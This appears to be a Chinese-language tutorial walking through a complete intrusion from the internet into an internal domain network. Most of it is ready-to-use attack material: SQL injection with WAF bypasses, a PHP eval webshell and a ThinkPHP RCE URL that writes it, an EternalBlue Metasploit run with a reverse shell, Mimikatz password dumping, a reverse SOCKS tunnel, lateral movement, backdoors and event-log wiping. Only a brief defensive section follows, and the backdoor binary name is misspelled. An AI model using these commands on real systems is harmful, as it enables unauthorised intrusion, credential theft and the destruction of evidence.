外网到内网渗透测试完整指南<\/h1>

环境拓扑与目标说明<\/h2>

攻击起点<\/strong>：公网环境<\/li>
目标网络<\/strong>：XX校园网（含Web服务及WAF防护） + XX企业网（无Web服务，内网隔离）<\/li>

最终目标<\/strong>：渗透进入内网，获取域控制权及敏感数据<\/li> <\/ul>
第一阶段：信息收集<\/h2>
1.1 CDN检测与真实IP获取<\/h3>
检测方法<\/strong>：<\/p>

使用ping<\/code>命令检测域名解析<\/li>
观察DNS记录类型：使用CNAME记录通常表明存在CDN<\/li>
通过历史DNS记录查询真实IP<\/li> <\/ul> 绕过CDN技术<\/strong>：<\/p> 查询域名历史解析记录<\/li> 使用全球DNS节点查询差异<\/li> 子域名爆破获取真实IP<\/li> <\/ul> 1.2 端口与服务扫描<\/h3> NMAP扫描命令示例<\/strong>：<\/p> nmap -sS -sV -O -p- 目标IP <\/span><\/span><\/code><\/pre>关键发现<\/strong>：<\/p> 开放端口：80（HTTP）、445（SMB）、8080（HTTP）<\/li> 操作系统：Windows Server 2008 R2<\/li> 潜在漏洞：MS10-054、MS10-061、MS17-101、CVE-2009-3103<\/li> <\/ul> 1.3 Web应用信息收集<\/h3> 技术手段<\/strong>：<\/p> 子域名爆破工具使用<\/li> WHOIS信息查询<\/li> 敏感目录扫描（使用nextassets等工具）<\/li> CMS指纹识别（ThinkPHP V5.0.0）<\/li> <\/ul> 第二阶段：Web应用渗透<\/h2> 2.1 目录遍历漏洞利用<\/h3> 发现可下载源代码文件的目录遍历漏洞<\/li> 通过代码审计发现逻辑漏洞和危险函数<\/li> <\/ul> 2.2 SQL注入攻击<\/h3> 注入检测<\/strong>：<\/p> 原始<\/span>URL：<\/span>http:\/\/<\/span>target\/<\/span>page?<\/span>id=<\/span>1<\/span> <\/span><\/span>测试语句：<\/span>and<\/span> 1<\/span>=<\/span>1<\/span> \/<\/span> and<\/span> 1<\/span>=<\/span>2<\/span> <\/span><\/span><\/code><\/pre>注入步骤<\/strong>：<\/p> 判断注入点<\/strong>：真值假值测试<\/li> 确定字段数<\/strong>：order by n<\/code> 逐步测试<\/li> 联合查询<\/strong>：union select 1,2,3,...<\/code><\/li> 获取数据<\/strong>：数据库名→表名→列名→数据<\/li> <\/ol> WAF绕过技术<\/strong>：<\/p> 大小写混合：UnIoN SeLeCt<\/code><\/li> 双写关键字：ununionion selselectect<\/code><\/li> 注释符分割：\/**\/union\/**\/select<\/code><\/li> <\/ul> 2.3 后台入侵与WebShell部署<\/h3> 获取凭证<\/strong>：<\/p> 通过SQL注入获取管理员用户名和密码<\/li> 发现明文存储的安全漏洞<\/li> <\/ul> WebShell上传<\/strong>：<\/p> 寻找文件上传功能点<\/li> 上传一句话木马：<?php @eval($_POST['cmd']);?><\/code><\/li> 通过数据库备份功能将后缀改为.php<\/li> <\/ul> 第三阶段：系统权限提升<\/h2> 3.1 命令执行漏洞利用<\/h3> ThinkPHP框架漏洞<\/strong>：<\/p> http:\/\/target:8080\/?s=index\/think\app\/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 <\/span><\/span><\/span><\/code><\/pre>写入WebShell<\/strong>：<\/p> http:\/\/target:8080\/?s=index\/think\app\/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd']);?> <\/span><\/span><\/span><\/code><\/pre>3.2 永恒之蓝漏洞利用（MS17-010）<\/h3> Metasploit操作流程<\/strong>：<\/p> use exploit\/windows\/smb\/ms17_010_eternalblue <\/span><\/span>set RHOSTS 目标IP <\/span><\/span>set PAYLOAD windows\/x64\/meterpreter\/reverse_tcp <\/span><\/span>set LHOST 攻击机IP <\/span><\/span>exploit <\/span><\/span><\/code><\/pre>3.3 密码提取与远程桌面<\/h3> Mimikatz使用<\/strong>：<\/p> # Meterpreter中执行<\/span> <\/span><\/span>load kiwi <\/span><\/span>kiwi_cmd privilege::debug <\/span><\/span>kiwi_cmd sekurlsa::logonpasswords <\/span><\/span><\/code><\/pre>启用远程桌面<\/strong>：<\/p> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"<\/span> \/v fDenyTSConnections \/t REG_DWORD \/d 0 \/f <\/span><\/span><\/code><\/pre>第四阶段：内网横向移动<\/h2> 4.1 内网信息收集<\/h3> 基础命令<\/strong>：<\/p> systeminfo # 系统信息 <\/span><\/span>net localgroup # 本地组信息 <\/span><\/span>net group \/domain # 域组信息 <\/span><\/span>net view \/domain # 域信息 <\/span><\/span><\/code><\/pre>4.2 代理与隧道建立<\/h3> SOCKS5代理设置<\/strong>：<\/p> # Kali端<\/span> <\/span><\/span>socks5proxy -s rcsocks -l 1080<\/span> -e 26254<\/span> <\/span><\/span> <\/span><\/span># 目标机端<\/span> <\/span><\/span>socks5proxywin -s rssocks -d Kali_IP -e 26254<\/span> <\/span><\/span><\/code><\/pre>Proxychains配置<\/strong>：<\/p> # \/etc\/proxychains.conf<\/span> <\/span><\/span>socks5 127.0.0.1 1080<\/span> <\/span><\/span><\/code><\/pre>4.3 域渗透技术<\/h3> 网络扫描<\/strong>：<\/p> proxychains nmap -sT -Pn 10.22.233.0\/24 <\/span><\/span><\/code><\/pre>横向移动方法<\/strong>：<\/p> IPC连接建立：net use \\目标IP\IPC$ \/u:"Administrator" "密码"<\/code><\/li> Psexec攻击：jump psexec_psh 目标IP<\/code><\/li> 凭证传递攻击<\/li> <\/ol> 第五阶段：持久化与痕迹清除<\/h2> 5.1 后门技术<\/h3> 映像劫持<\/strong>：<\/p> 注册表路径：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options<\/code><\/li> 添加恶意程序路径<\/li> <\/ul> Shift后门<\/strong>：<\/p> 替换系统setch.exe<\/code>程序<\/li> 在登录界面连续按Shift键触发<\/li> <\/ul> 计划任务<\/strong>：<\/p> schtasks \/create \/tn "任务名"<\/span> \/tr "程序路径"<\/span> \/sc daily \/st 时间 <\/span><\/span><\/code><\/pre>5.2 日志清除<\/h3> Windows日志清除<\/strong>：<\/p> # Meterpreter中 <\/span><\/span>run event_manager -c <\/span><\/span> <\/span><\/span># 手动清除 <\/span><\/span>wevtutil cl system <\/span><\/span>wevtutil cl application <\/span><\/span>wevtutil cl security <\/span><\/span><\/code><\/pre>IIS日志路径<\/strong>：<\/p> IIS7+：C:\inetpub\logs\LogFiles<\/code><\/li> 定期清理访问记录<\/li> <\/ul> 第六阶段：溯源分析<\/h2> 6.1 应急响应检查点<\/h3> 实时监测<\/strong>：<\/p> 异常网络连接<\/li> 可疑进程创建<\/li> 系统日志异常条目<\/li> <\/ul> 取证分析<\/strong>：<\/p> 文件时间戳分析（按修改时间排序）<\/li> 注册表键值异常修改<\/li> 计划任务异常项<\/li> <\/ul> 6.2 日志分析重点<\/h3> Windows事件日志<\/strong>：<\/p> 事件ID 4624\/4625：登录成功\/失败<\/li> 事件ID 4672：特殊权限分配<\/li> 事件ID 4720：用户账户创建<\/li> <\/ul> IIS日志分析<\/strong>：<\/p> 异常HTTP状态码（如大量404尝试）<\/li> 可疑User-Agent<\/li> 异常请求参数（SQL注入特征）<\/li> <\/ul> 总结与防护建议<\/h2> 防护措施<\/h3> 网络层<\/strong>：严格防火墙策略，限制不必要的端口开放<\/li> 系统层<\/strong>：及时安装安全更新，禁用过时协议（如SMBv1）<\/li> 应用层<\/strong>：输入验证、参数化查询、最小权限原则<\/li> 监控层<\/strong>：实时安全监控、日志审计、异常行为检测<\/li> <\/ol> 安全开发规范<\/h3> 避免明文存储敏感信息<\/li> 实施严格的输入过滤机制<\/li> 定期安全代码审计<\/li> 使用预编译语句防止SQL注入<\/li> <\/ul> 本指南详细记录了从外网到内网的完整渗透流程，强调了每个阶段的关键技术和注意事项，为安全防护提供了全面的参考依据。<\/p>